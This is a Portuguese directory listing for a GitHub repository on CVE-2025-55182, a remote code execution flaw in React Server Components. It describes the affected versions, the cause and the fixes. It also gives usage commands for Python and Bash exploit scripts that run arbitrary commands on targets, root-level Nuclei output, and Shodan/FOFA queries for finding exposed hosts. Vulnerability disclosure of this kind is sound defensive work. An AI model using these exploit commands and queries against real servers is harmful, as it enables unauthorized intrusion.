Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Uma vulnerabilidade crítica de Execução Remota de Código (RCE) afetando a implementação dos React Server Components (RSC) em vários pacotes, incluindo. | Kitploit
Ferramentas/GitHubGitHub/cyberleelawat/cve-2025-55182
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

Uma vulnerabilidade crítica de Execução Remota de Código (RCE) afetando a implementação dos React Server Components (RSC) em vários pacotes, incluindo.

113há 3 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 – Execução Remota de Código em React Server Components

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

Criado por : Virendra Kumar

Empresa : Cyber Leelawat

Website : www.cyberleelawat.in

Visão Geral

O CVE-2025-55182 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta a implementação do React Server Components (RSC) em vários pacotes, incluindo:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

A vulnerabilidade existe devido à desserialização insegura de payloads enviados através do protocolo interno Flight usado pelo RSC. Quando certas entradas não confiáveis fluem através dos React Server Components via requisições HTTP, a execução de código no lado do servidor pode ser acionada.

As versões afetadas incluem:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

As versões corrigidas incluem:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Como a vulnerabilidade funciona (alto nível)

Os React Server Components aceitam requisições do lado do cliente que são analisadas e desserializadas no backend. A vulnerabilidade surge de controles insuficientes em torno da desserialização de dados recebidos, permitindo que payloads especialmente criados sejam interpretados como componentes executáveis do lado do servidor. Quando isso acontece, a execução arbitrária de JavaScript pode ocorrer no servidor, o que pode levar ao comprometimento completo do servidor, dependendo do ambiente de hospedagem e privilégios.


Causa Raiz

  • Falta de validação adequada de entrada nos streams do protocolo Flight do RSC.
  • Limite de confiança do servidor incorretamente assumido como seguro.
  • Análise insegura no lado do servidor a partir de entrada de usuário não confiável.

Impacto

Se explorado, um atacante pode ser capaz de:

  • Alcançar execução remota de código
  • Executar comandos arbitrários no servidor
  • Acessar banco de dados ou recursos de nível de SO
  • Instalar malware ou backdoors
  • Roubar dados sensíveis
  • Realizar movimentação lateral dentro da infraestrutura

Pontuação CVSS: 10.0 – CRÍTICA


Teste Manual (Identificação Defensiva Segura)

Objetivo principal:

Verificar se a aplicação expõe React Server Components e se versões afetadas estão em uso.

Passo 1 — Verificar presença de RSC via características de resposta

curl -I https://target.com/?__rsc=1

Reconhecimento via Google (palavras-chave defensivas)

Essas palavras-chave ajudam a identificar se um repositório público ou aplicação web referencia componentes RSC.

"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

Verificar:

  • Recursos RSC estão presentes?
  • Pacotes visíveis em bundles front-end?
  • Referências públicas em Git?

Exemplo de Consultas Internas no Google (apenas seu próprio escopo)

site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

Destinado apenas à auditoria interna do domínio da sua organização.


Shodan (Identificação segura de tecnologia)

Verifique o uso de frameworks expostos, não exploração de vulnerabilidades.

http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

Apenas Classificação de Tecnologia FOFA

title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

Teste Automatizado (Interno/Laboratório)

Para automatizar a varredura defensiva, clone a lógica de detecção baseada em templates para sua própria avaliação de infraestrutura:

git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Template Nuclei

$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Exploit RCE em Python (CVE-2025-55182.py)

Script de exploração RCE completo que executa comandos arbitrários e recupera a saída.

Uso:

python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Exploit Bash

Instalação

chmod +x scanner.sh

Uso

# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

Opções

  • -d, --domain - Domínio/URL alvo (obrigatório)
  • -c, --command - Comando a executar (padrão: id)

Exemplos

# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

Requisitos

  • Bash

  • curl

  • openssl

    Crédito: Script Bash e Python criado originalmente por @zack0x01 e @sickwell. Usado com agradecimento.

Os templates dentro do repositório são destinados a:

  • identificação de versão
  • verificações de visibilidade
  • inventário de infraestrutura
  • conscientização sobre vulnerabilidades

IMPORTANTE: Esses templates devem ser executados apenas em sistemas que você possui ou está autorizado a avaliar.


Nuclei (Declaração de Uso Defensivo)

Os templates Nuclei incluídos neste repositório são destinados exclusivamente para:

  • validação de versão de dependências
  • fingerprint indireto
  • verificações passivas
  • auditoria interna de segurança

Por favor, garanta:

  • você possui autorização por escrito
  • você está escaneando apenas seus próprios ativos
  • você cumpre as leis e políticas locais

Mitigações Recomendadas

Atualize imediatamente

Atualize para uma das versões corrigidas:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Se não puder atualizar imediatamente

  • desabilitar recursos RSC temporariamente
  • isolar componentes do servidor
  • implementar regras de WAF
  • restringir a superfície de rede exposta

🤝 Conecte-se Comigo

👨‍💻 Cyber Leelawat

Pesquisador de Segurança • Instrutor de Cibersegurança • Caçador de Bug Bounties

Lema: Zero Trust Full Secure 🚀

Baixar ferramenta